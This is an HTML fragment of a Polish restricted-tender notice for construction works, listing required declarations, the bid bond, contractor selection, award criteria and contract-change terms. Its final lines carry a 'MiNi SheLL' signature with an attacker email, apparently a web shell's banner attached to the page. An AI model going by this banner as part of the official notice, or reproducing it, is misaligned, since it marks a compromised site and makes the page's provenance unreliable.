Wykaz osób, które zostały skierowane przez Wykonawcę do realizacji zamówienia, o których mowa w Rozdziale VI pkt 1c  załącznik nr 4 
do Ogłoszenia (Dla osób niebędącymi etatowymi pracownikami Wykonawcy należy załączyć zobowiązanie do współpracy - załącznik nr 11 do Ogłoszenia),

oświadczenie Wykonawcy dotyczące posiadania uprawnień oraz spełniania wymogów ustawy o ochronie informacji niejawnych przez osoby skierowane przez Wykonawcę do realizacji zamówienia  załącznik  nr 9
do Ogłoszenia,

oświadczenie Wykonawcy o spełnianiu wymogów przepisów o ochronie informacji niejawnych  załącznik nr 10 + 10a;
oświadczenie o spełnaniu warunków Ustawy o odpadach z dnia 14.12.2012r w zakresie wytwarzania i transportu odpadów (Dz. U. z 2013r poz. nr 21)  załącznik nr 12 do ogłoszenia

na potwierdzenie braku podstaw do wykluczenia:

aktualne na dzień składania wniosków o dopuszczenie do udziału 
w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 3 do  Ogłoszenia, 

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">aktualne na dzień składania wniosków o dopuszczenie do udziału 
w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 2 
do Ogłoszenia 

wykaz wykonanych zamówień + dowody określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego 
i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty - załącznik nr 6 do Ogłoszenia

Wykonawca nie ma obowiązku przedstawiania dowodów, o których mowa w zdaniu poprzednim, w stosunku do robót budowlanych wykonanych na rzecz Zamawiającego.
	
Wykaz, o którym mowa powyżej posłuży Zamawiającemu do oceny spełnienia kryteriów selekcji.

Wykaz osób, które zostały skierowane przez Wykonawcę do realizacji zamówienia, o których mowa w Rozdziale VI pkt 1c  załącznik nr 4 
do Ogłoszenia (Dla osób niebędącymi etatowymi pracownikami Wykonawcy należy załączyć zobowiązanie do współpracy - załącznik nr 11 do Ogłoszenia),

oświadczenie Wykonawcy dotyczące posiadania uprawnień oraz spełniania wymogów ustawy o ochronie informacji niejawnych przez osoby skierowane przez Wykonawcę do realizacji zamówienia  załącznik  nr 9
do Ogłoszenia,

oświadczenie Wykonawcy o spełnianiu wymogów przepisów o ochronie informacji niejawnych  załącznik nr 10 + 10a;
oświadczenie o spełnaniu warunków Ustawy o odpadach z dnia 14.12.2012r w zakresie wytwarzania i transportu odpadów (Dz. U. z 2013r poz. nr 21)  załącznik nr 12 do ogłoszenia

na potwierdzenie braku podstaw do wykluczenia:

aktualne na dzień składania wniosków o dopuszczenie do udziału 
w postępowaniu oświadczenie w zakresie wskazanym w załączniku nr 3 do  Ogłoszenia, 

</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wypełniony i podpisany wniosek o dopuszczenie do udziału w przetargu ograniczonym  załącznik nr 1 do Ogłoszenia (oryginał podpisany przez Wykonawcę),
Zobowiązanie innego podmiotu na zdolnościach, którego zamierza polegać Wykonawca w celu potwierdzenia udziału w postepowaniu  załącznik nr 7 Ogłoszenia (oryginał podpisany przez ten podmiot),
pełnomocnictwo:
	dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu Wykonawcy, (jeżeli reprezentuje go pełnomocnik) lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
o ile nie wynika ono z przepisów prawa lub innych dokumentów,
	w przypadku podpisania oferty i opatrzenia dokumentów klauzulą 
za zgodność z oryginałem przez osobę inną niż wymieniona 
w dokumencie rejestrowym, a reprezentującą Wykonawcę.
Zgodnie z art. 24 ust. 11 ustawy Pzp Wykonawca w terminie 3 dni od dnia przekazania informacji o wynikach oceny spełnienia warunków udziału w postępowaniu 
i otrzymanych ocenach spełnienia tych warunków przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, 
o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp stanowi załącznik nr 5 do Ogłoszenia.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający będzie wymagał wniesienia wadium od Wykonawców, którzy zostaną  zaproszeni do składania ofert. 
Wadium wynosi 33 000 zł (trzydzieści trzy tysiące złotych).
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Należy podać informacje na temat udzielania zaliczek:
                  <br />Zamawiający przewiduje udzielanie Wykonawcy zaliczek na poczet wykonania niniejszej roboty budowlanej zgodnie z § 16 projektu umowy</div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  20<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />a)	Zamawiający zaprosi do złożenia oferty nie mniej niż 5 nie więcej  niż 20 Wykonawców, którzy spełnią warunki udziału w postepowaniu, o których mowa w Rozdziale VI Ogłoszenia.
b)	Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 20, Zamawiający wyłoni Wykonawców przyznając punktację za wykazanie się większego doświadczenia w zakresie budowy, przebudowy lub remontu obiektu w zakresie konstrukcji, robót elektrycznych, robót sanitarnych oraz teletechnicznych o wartości minimum 1 000 000,00 zł
Za każdą wykonaną należycie (ponad wymagane doświadczenie) w ww. zakresie Zamawiający przydzieli 1 punkt.
c)	Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postepowaniu, będzie mniejsza niż 20, Zamawiający zaprosi do składani ofert wszystkich Wykonawców.
</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>30</td></tr><tr><td>okres gwaracji </td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Wszelkie zmiany do umowy mogą być zgodnie z brzmieniem art. 144 UZP dokonane za zgodą obu stron, wyrażoną pod rygorem nieważności na piśmie w poniżej określonych przypadkach i warunkach:
1)	terminu wykonania zamówienia  gdy w szczególności zmiana terminu wynika z uzasadnionego wniosku użytkownika, który z racjonalnych przyczyn zawnioskuje o przesuniecie terminu realizacji umowy lub zmianę harmonogramu prac, w tym, jeżeli taki wniosek uzasadnia ważny interes obrony RP. Zmiana terminu może wynikać także z:
	wystąpienia robót zamiennych;
	nieterminowego przekazania Wykonawcy placu budowy, dziennika budowy, dokumentacji projektowej, osnowy geodezyjnej;


	wystąpienia zamówień dodatkowych, które determinują wykonanie zamówienia podstawowego.
2)	Zmiany za zgodą Zamawiającego w zakresie zaoferowanych materiałów, urządzeń itp.  w przypadku gdy w szczególności w trakcie realizacji umowy nastąpi wycofanie materiałów, urządzeń itp. ze sprzedaży, a wprowadzenie substytutów nie powoduje zmiany parametrów świadczenia.
3)	Zmiany w zakresie osób reprezentujących strony umowy, w szczególności w sytuacjach losowych, zmian organizacyjnych  kierownika budowy i kierowników robót branżowych, inspektorów nadzoru.
4)	Zmiany w zakresie wskazanych dla realizacji umowy podwykonawców  w przypadku gdy w szczególności podwykonawca wadliwie wykonuje umowę, w tym zaprzestał jej wykonywania lub w razie upadłości/likwidacji Podwykonawcy.
5)	Wartości zakresu realizacji umowy  w szczególności w przypadku wyłączenia obiektu, urządzenia z użytkowania lub jego likwidacji, konieczności wykonania prac zamiennych lub zmniejszających zakres robót oraz zmiany technologii wykonania robót.
6)	Zmiany limitu finansowego w danym roku budżetowym.
7)	Wystąpienia wyjątkowych, nieprzewidzianych oraz niezależnych od stron okoliczności (np. znalezienie niewybuchów, odkrycie niezinwentaryzowanych urządzeń podziemnych, odmowy udostępnienia obiektów przez Użytkownika, itp.).
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/04/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com